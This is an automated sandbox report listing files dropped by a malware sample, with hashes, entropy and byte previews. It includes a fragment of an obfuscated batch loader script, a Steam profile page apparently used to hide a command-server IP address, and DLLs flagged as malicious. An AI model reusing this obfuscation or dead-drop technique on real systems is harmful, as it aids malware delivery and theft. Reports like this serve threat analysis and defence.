                                                                                                                                                                                                                                    Preview:.....7k.....N.C{b.\DH..R.:..X....a...'cR1..j...NkD.0_.|*...*Q0o..V..}j....e...s..V..N.fq6.i9..G.........7m..n.8...C....P{5Fuj.....c...".|....O.U.Z.z./!g.N;r.d.x}...}...cD...'a+1..=vY..r...W.f.cVU8.Z..x.....@..~;.>.I..>y..r........_.[b...qo.l..\.J.U...c...i..9G....]..b.k.DK...g...(...UL.3.7'...W.....7...@...V.<.h-..c...y..F;.>.9.......U......*s.x..7.H.74...8....9.wC>.....vG1.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rx...5.<.'.F...h.............W...e.,cW...e.,ckC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..q.%..,P..Myn.2..t.W........7I....[.W...OT.cW...e.,cm......2.q8.5...x..2).U.j....>.l#...w....i..`|.....@}.-|......"I...G..eI..a0f.d=...>Q...K.Y.....L.d.../...... D(N....7
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):101310
                                                                                                                                                                                                                                    Entropy (8bit):7.998271136344218
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:3072:+hlUcSrsdHrxCDf8GHzm1uQGVM9kXxSv9Rk:+snrs9QkwC1uBVIkw9+
                                                                                                                                                                                                                                    MD5:EBDA2C7040E8C58FE501E2BEFC215C9B
                                                                                                                                                                                                                                    SHA1:777CACD0DC15591562323DE74C26BB3BDF1F8EB8
                                                                                                                                                                                                                                    SHA-256:965B24F99D4905EB4591F3450BB9DD5BD7883D014CAC5CE7F9A8A78C038689B3
                                                                                                                                                                                                                                    SHA-512:1BA77123472ADDA6374B162C1536171CA3B190FA7053F505C8D4C37E6ABFE0EAF4A972936594D34621885C1F14CE596CB09AD16226734985FCF77AD3BD3839B5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:j.....f..a?|..5(.PO.;x...E.#.b9..a.......^..Q..p..E..K?..MT..|....S.. '...hrMs]c}...8.J....wU-_O.....GG>.>..\...j.a..Ii..].._...!y.B....3..^....V...K.z.^.q.....oS...~.+.@F....t".a.iU..eQ[...c.q.#.c.B..z..\..J.K...h....k.U.@\.u./.%r.....a|B.G....h.=T.wPO.,......[............wd.!..?.c..@....z....#....o.v..&.X.......n.&...)..X"..8...W.+..p{.c.S.1...;g8........K.A.-+{).."J.....3...OP.I.....X.2..ha..s5,.....M.o.0i.g..h........S..88.DjW...F...gu-.......%..N*....E.3... ..\.s.,...DN6;lO..#sC.g..3g.$..R.....,..5T~..n..h.Nn...#.;...T..s.........t..p.S.~.[.1."c....Pv..zW ...2...d$R.`pY.(.T.F......*1......K.F....N..$Nn..EY&if.B`.;[........KOE.....]9.a.`S..... o.....U.Y?N4.d].R...k....rJF....p.\.h..1..*.....$....MM?.0.p.I.Sm*-/...Dt..3........Xd:.........~&..~...[....QC.....H...X.@k..$K.C.T...O..Q.,.On...W.....f..:py@..I...H...P.x....a..e..j.."n....kK..Qd.3m...W...".~.}.....R..;....C.T.Jj..e...e....X..GWS....Y.F.o |m....N.`...9*.4.X...O.)...V....(
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):51815
                                                                                                                                                                                                                                    Entropy (8bit):6.766178172090266
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:Br2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8qT4O:12+9BBVgCOa1ZBPaPQaEwo0yv
                                                                                                                                                                                                                                    MD5:5A6D4A5C98E19A5A228702132DDB17A0
                                                                                                                                                                                                                                    SHA1:181BA336C9668CAEDA737645536D3CE59AF6D1FE
                                                                                                                                                                                                                                    SHA-256:08CD81C4D2A2A1A935E70C419C27F469AF624D42DC1F2D24E71E1BB306F9ABAC
                                                                                                                                                                                                                                    SHA-512:2F51DF588407C83EFE13287E6B33A45108644CBE77117EF93C1BF2A9697FA9E468E3F9843BE7CAE15970996D606012A71295EA5FD872230DAFB59E43C59C58A2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]........................................k......................^...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...^........................k.................................]...]...e...o...o...o...o...o...n...]...]...i...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...h...]...].......................................................b...]...]...p..............................].......................................................................................]...]...a............................W.....................]...]...]...]..............................q...].............................................................................]...]...]...].......................W.........................]...]...]...]...]..............................`...`..........
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (877), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):22869
                                                                                                                                                                                                                                    Entropy (8bit):5.032392536726604
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:KCyCXnbUYiWQI8jc+G+eqlg8byUUh/zZFU8KzKC+C8IUVNJ54xACUVN7T9SoizwN:KErUYijQKlldypSVKCvgV4xLg19AmQd8
                                                                                                                                                                                                                                    MD5:DC220C71F09BC18A50633B924B64B158
                                                                                                                                                                                                                                    SHA1:114C82651132BC93E1965B3B38D7DD1E74A540EC
                                                                                                                                                                                                                                    SHA-256:50AAB160C0370EDCB1C6F967CB17B7C6F5AE7CA01B7EE3EE435659F8E6B57B1A
                                                                                                                                                                                                                                    SHA-512:4B3B993966C1AF06C06ECE9B02D002F627827E9711B5D9124852D1915DA563D0A576FEE1E5A53A5FFA1727E3110F24C0FDF792C9CA640149838BFE70EFD0E950
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:Set Competing=P..JyMandatory Rankings ..bQVSubsidiary Huge Grow Disciplines Renewable Gave Ht Hugh Synthetic ..VpTwenty ..CxSticky Individuals Attacks Converter Pickup ..dodQuantities Animated Photograph Cleared ..Set Mozilla=t..LlHub Unions Inter ..dMKnowing Alt ..soVe ..nRINUnder Move Asus Artist Queensland Spectrum Phys Republic Neil ..FmapTraditional ..QUWhCanvas Blocked Analysts Mardi Warrant Purple Cooling Briefing ..Set Juvenile=n..kfSTMac Isa Available Harm ..fFSQSwitching App Joint Airline Retained Specialists Registration Blvd Individual ..qpTXJournal Differences Varies Lycos Capitol ..keEgSubtle Sri Unauthorized Stakeholders ..pLrCitizens Outstanding Interactive Titled Brisbane Jamaica Condo Guided ..xaFuHerald Amateur Personality Expect Pressed Adolescent Pc Accessibility ..MsYUNormal Investigate ..bPyzSee Antivirus Highland Pets Preserve Sms Cakes Conservation ..Set Trash=A..YAQRAlice Aruba Computing Christianity Red Quickly Molecules Caught ..wPbTobacco Settings Accredite
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (877), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):22869
                                                                                                                                                                                                                                    Entropy (8bit):5.032392536726604
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:KCyCXnbUYiWQI8jc+G+eqlg8byUUh/zZFU8KzKC+C8IUVNJ54xACUVN7T9SoizwN:KErUYijQKlldypSVKCvgV4xLg19AmQd8
                                                                                                                                                                                                                                    MD5:DC220C71F09BC18A50633B924B64B158
                                                                                                                                                                                                                                    SHA1:114C82651132BC93E1965B3B38D7DD1E74A540EC
                                                                                                                                                                                                                                    SHA-256:50AAB160C0370EDCB1C6F967CB17B7C6F5AE7CA01B7EE3EE435659F8E6B57B1A
                                                                                                                                                                                                                                    SHA-512:4B3B993966C1AF06C06ECE9B02D002F627827E9711B5D9124852D1915DA563D0A576FEE1E5A53A5FFA1727E3110F24C0FDF792C9CA640149838BFE70EFD0E950
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:Set Competing=P..JyMandatory Rankings ..bQVSubsidiary Huge Grow Disciplines Renewable Gave Ht Hugh Synthetic ..VpTwenty ..CxSticky Individuals Attacks Converter Pickup ..dodQuantities Animated Photograph Cleared ..Set Mozilla=t..LlHub Unions Inter ..dMKnowing Alt ..soVe ..nRINUnder Move Asus Artist Queensland Spectrum Phys Republic Neil ..FmapTraditional ..QUWhCanvas Blocked Analysts Mardi Warrant Purple Cooling Briefing ..Set Juvenile=n..kfSTMac Isa Available Harm ..fFSQSwitching App Joint Airline Retained Specialists Registration Blvd Individual ..qpTXJournal Differences Varies Lycos Capitol ..keEgSubtle Sri Unauthorized Stakeholders ..pLrCitizens Outstanding Interactive Titled Brisbane Jamaica Condo Guided ..xaFuHerald Amateur Personality Expect Pressed Adolescent Pc Accessibility ..MsYUNormal Investigate ..bPyzSee Antivirus Highland Pets Preserve Sms Cakes Conservation ..Set Trash=A..YAQRAlice Aruba Computing Christianity Red Quickly Molecules Caught ..wPbTobacco Settings Accredite
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):274432
                                                                                                                                                                                                                                    Entropy (8bit):6.473318956335122
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:RDqeb2Xo2IkVvh8p65Nu+dVtqi/x4Rqf21Rgat0g/bZaUAg0FuPOKBNEBNUGXEym:5b2M8JTDD/xcq21R1p/rAOPOei7TdFe
                                                                                                                                                                                                                                    MD5:57A0563FA947FA63F3A0CE5E8BDF0E9F
                                                                                                                                                                                                                                    SHA1:5F6D92031F3964E31FE0AF6876D06732C5324929
                                                                                                                                                                                                                                    SHA-256:4CFD6475BD4656927F89B461B41ED5A71B541E670B8CE9313177DDC2F2AF586F
                                                                                                                                                                                                                                    SHA-512:1C31E64155EEAF548D3244DB7EBF0A0BBDDAFB608A813EDAB1C451267452A888D521C329660C0D566EAC40E17A0134DBCF8525FFDC9E90716A2B97F38E275E5F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.0....I...t .u.3.PPP....I..u....[]..3.@.F...S.....Y....j.j..H.......M..(,.._^3.[..]...U..SV.u....9)...]....t.hT.K....D(.... t.hX.K....3(.....t.hp.K...."(.....t.hH.K.....(....y.h\.K.....(.....t.ht.K.....'........t.h`.K.....'........t.hd.K.....'........t.hh.K....'.....@..t.h<.K....'..^[]...U..........SV..L$tW. ...M.3.h..I..D$(..^...}..G..0...[...N....D$4.D$H.A..D$L.A..D$P.A..D$T...G..p....d[...N....D$(.D$h.A..D$l.A..D$p.A..L$..D$t.... ...L$8......G..p....![...F....JQ..P.L$0..Q.....K.V.t$0....P.L$<..%..h.K..L$<.g..h.K..L$<.D$..g.....D$...................;........D$8P.L$..O%..h..K..L$..a&...D$..L$x+.N@VP.D$@P.!...D$xP.L$...%.....K..L$.V.,&..Vj..|S..YY....S...V.L$...&..3.F9t$.v&V.L$...#..f.8|u.V.L$..."..3.f..F;t$.r.}..r..G..H.....D$$h........YP.L$...O...}..r5.G..p.....Y...F..t$..0V.<..YY....j.j..H....}........t$.3.f..jX..$....j.P.r<...D$0....}....$.....D$...$.....D$4..$.....D$(..$..........$....X....$..........$.....$......I........G..H...\......u.G..H...\....xf.G..H.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):89088
                                                                                                                                                                                                                                    Entropy (8bit):4.996886610083188
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:T6JPTcUNx6/xhgariwYLTN3EfrDWyu0uZm:T6i/xhgariwYLTNaWy4Zm
                                                                                                                                                                                                                                    MD5:6176ADAD0654DD8E9E529062F55CD13B
                                                                                                                                                                                                                                    SHA1:5B8BD0652E1C5779F92DBB2210861AE583E6E079
                                                                                                                                                                                                                                    SHA-256:E4AA6A8AD0ABE33BB31DA0257A824FA307BB8AD081F0E1CE990ED505FF8A71B1
                                                                                                                                                                                                                                    SHA-512:25AB998C42DA8EA606FD940DE3316C84F89A0DE7677EFED4C4CD58B617DB8685425FC535423CA3122E83D2935266EFE09EA6A20B28B2CC940D5077EDEFE42D53
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:viously-checked referenced subpattern not found.DEFINE group contains more than one branch.repeating a DEFINE group is not allowed.inconsistent NEWLINE options.\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number.a numbered reference must not be zero.an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT).(*VERB) not recognized or malformed.number is too big.subpattern name expected.digit expected after (?+.] is an invalid data character in JavaScript compatibility mode.different names for subpatterns of the same number are not allowed.(*MARK) must have an argument.this version of PCRE is not compiled with Unicode property support.\c must be followed by an ASCII character.\k is not followed by a braced, angle-bracketed, or quoted name.internal error: unknown opcode in find_fixedlength().\N is not supported in a class.too many forward references.disallowed Unicode code point (>= 0xd800 && <= 0xdfff).invalid UTF-16 string.name is too long in
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):167936
                                                                                                                                                                                                                                    Entropy (8bit):6.686684672613532
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:iqGjLPQ6ClAMfA4lelIJBSLPNGR5yiPlcQ4NvoWV7a5ouYNqnLzAfaBaGz:DAQzyMfA+eyVPlcBgtoTqnvAfcaGz
                                                                                                                                                                                                                                    MD5:0727D52E12E35408303447803BD2376B
                                                                                                                                                                                                                                    SHA1:22929DABEE2649C17417870C2BD3E7892F256C64
                                                                                                                                                                                                                                    SHA-256:F161E08DBF22ACEC7C9ED200F3CDC1C3693D5636EB2AA2D4693F4982392B609E
                                                                                                                                                                                                                                    SHA-512:9C34B34ACF66961D99FBF5828BC8959D0C0E6AFFF1E8DEC828B247B9BF5478A9E5A24610D727ECC3C32F4C3720AC223D08E88CBDCF62C36FC4B44046465DA3CD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.}..|..U..M...B.......}...........................h...;u..._..............f..f#......f;...@.............E..@...........u..v........u.....E..@..E...........M..I..M..{...9G........G........w....G.;...y..........n....E.........E.........E........=..........=...........l....................l..........0.w]t:......t..... .u_............3................f..4....s...3.................4........R.......@.t.....P...4.......................$...........".........^.....VUUU........;...3....Y...[.......P...gJ..............u..F.......E............@........f;.w......4..u.M.....|........s..............KK..........y.I..A.....E.hJ.f...$?J.f......E..q........f;.w.........E....#.......................KK..........y.I..A.....E.hJ.f...$?J.f......E......}..........;...............t'.u.......R...P.....................5..|......+.;.w&f..f;.4...u..........f.F.f;.6............;u.s.f.......f#......f;.u......|.........;.s}.k...;.st........t"j.......R...P..........uJ.......-..|....
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):34667
                                                                                                                                                                                                                                    Entropy (8bit):5.430913064404288
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:G7pqLtWY7wt5D0gqe4iNGAgZ4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2SHM:G78LtWY7wt5D0gqe4cgZ4VWBCW3KI8ir
                                                                                                                                                                                                                                    MD5:8C37A2DF8138F6511C6F180A26FF6F54
                                                                                                                                                                                                                                    SHA1:ED92858251078281E7B15F199AEFF9E5FEEE2522
                                                                                                                                                                                                                                    SHA-256:92E455132F257D943620A29C8165535A7A0F059D9BDFA68AFB9F554B45EDC47A
                                                                                                                                                                                                                                    SHA-512:D6639F9E7B7AF4063B2BCC0F9810AFC244F62C5556DA76D3E77886208DF727D6ECAF5C668209207E3FE9B4D0FA2CFD50C069C142D046CFFB3E65111BED7C2393
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: nve7n2 https://37.27.87.155|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.c
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2459136
                                                                                                                                                                                                                                    Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                    MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                    SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                    SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
